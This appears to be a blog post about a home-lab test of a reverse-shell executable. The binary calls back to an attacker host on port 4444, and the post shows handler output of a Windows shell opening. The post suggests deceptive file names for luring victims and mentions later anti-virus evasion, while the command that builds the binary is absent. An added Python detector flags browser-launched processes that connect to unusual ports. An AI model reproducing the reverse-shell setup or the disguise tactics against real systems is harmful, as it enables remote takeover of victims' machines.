My first shot at this was sort of a "hello world" in my own network just to see it work, so I built a reverse connect binary called exploitme.exe using the following command:
That basically says "when someone runs exploitme.exe, connect back to 192.168.168.13 on port 4444 and serve up a shell as the user that executed the exploit". I put that .exe on a local web server so I could grab it on a Windows box later.
Then on the attacker machine (.13) the same code is essentially used as a handler, which just hangs around and waits for the exploited machine to call home:
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:4444
So this, all by itself, was way too easy... I hop on a Windows 7 machine and download exploitme.exe (of course, if this were really an attempt to attack someone, better names include: setup.exe, crack.exe, avg_free.exe, limewirepro.exe, etc...). Anyway, once the executable is downloaded and the user tries to run it, nothing seems to happen on their end (there is no real program in this version, just the exploit), and the waiting handler on the attacker's machine is greeted with this:
[*] Starting the payload handler...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.168.13:4444 -> 192.168.168.24:51166)
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files\Mozilla Firefox>
...awesome.
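The behaviour shown above (a binary launched from a browser that immediately opens an outbound TCP connection to an unusual port) is exactly the pattern an endpoint detection rule can catch. The following is an added defender-side example, not code from the original post: it correlates constructed, Sysmon-style process-creation and network-connection records (the pipe-delimited format, the PIDs, the paths and the 60-second window are all assumptions made here) and flags a browser-spawned process that calls out to a non-standard port shortly after starting. The 192.168.168.13:4444 destination is taken from the post; the other addresses are constructed.

```python
"""Correlate process-creation and network-connection events to flag a
browser-launched executable that immediately connects back out.

Added defensive example; the log format and sample events are constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Parent processes from which a freshly downloaded binary is typically run.
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
# Outbound ports a user-launched program is ordinarily expected to use.
EXPECTED_PORTS = {80, 443}

# Constructed sample log: ts|kind|pid|image|parent_image|dst_ip|dst_port
SAMPLE_LOG = r"""
2010-06-01T12:00:00|ProcessCreate|3012|C:\Users\bob\Downloads\exploitme.exe|C:\Program Files\Mozilla Firefox\firefox.exe||
2010-06-01T12:00:01|NetworkConnect|3012|C:\Users\bob\Downloads\exploitme.exe||192.168.168.13|4444
2010-06-01T12:00:05|ProcessCreate|3100|C:\Program Files\Mozilla Firefox\firefox.exe|C:\Windows\explorer.exe||
2010-06-01T12:00:06|NetworkConnect|3100|C:\Program Files\Mozilla Firefox\firefox.exe||203.0.113.10|443
2010-06-01T12:00:10|ProcessCreate|3200|C:\Users\bob\Downloads\setup.exe|C:\Program Files\Mozilla Firefox\firefox.exe||
2010-06-01T12:01:30|NetworkConnect|3200|C:\Users\bob\Downloads\setup.exe||203.0.113.20|443
"""


@dataclass
class Event:
    ts: datetime
    kind: str            # "ProcessCreate" or "NetworkConnect"
    pid: int
    image: str           # full path of the process image
    parent: str          # parent image file name, lower-cased (ProcessCreate only)
    dst_ip: str          # destination address (NetworkConnect only)
    dst_port: Optional[int]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(lines) -> List[Event]:
    """Parse the pipe-delimited sample format into Event records."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, kind, pid, image, parent, dst_ip, dst_port = line.split("|")
        events.append(Event(
            ts=datetime.fromisoformat(ts),
            kind=kind,
            pid=int(pid),
            image=image,
            parent=basename(parent) if parent else "",
            dst_ip=dst_ip,
            dst_port=int(dst_port) if dst_port else None,
        ))
    return events


def find_reverse_connects(events: List[Event], window_seconds: int = 60) -> List[Tuple[int, str, str, int]]:
    """Return (pid, image_name, dst_ip, dst_port) for every browser-spawned
    process that connects to a non-standard port within window_seconds of
    being created."""
    started = {}   # pid -> ProcessCreate event of a browser-spawned process
    hits = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "ProcessCreate":
            if ev.parent in BROWSERS:
                started[ev.pid] = ev
            else:
                started.pop(ev.pid, None)   # PID reused by an unrelated process
        elif ev.kind == "NetworkConnect" and ev.pid in started:
            origin = started[ev.pid]
            young = ev.ts - origin.ts <= timedelta(seconds=window_seconds)
            if young and ev.dst_port not in EXPECTED_PORTS:
                hits.append((ev.pid, basename(ev.image), ev.dst_ip, ev.dst_port))
    return hits


if __name__ == "__main__":
    for pid, image, ip, port in find_reverse_connects(parse_events(SAMPLE_LOG.splitlines())):
        print(f"ALERT pid={pid} {image} -> {ip}:{port} shortly after browser launch")
```

Only exploitme.exe is reported: firefox.exe itself talks to 443 and is not browser-spawned, and setup.exe both waits longer than the window and uses an expected port. In a real deployment the two record types map onto Sysmon Event ID 1 (process creation) and Event ID 3 (network connection); the window and port allow-list are the knobs that trade false positives against missed low-and-slow callbacks.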
In the future I'll have a look at anti-virus evasion and more entertaining payloads than just a simple shell.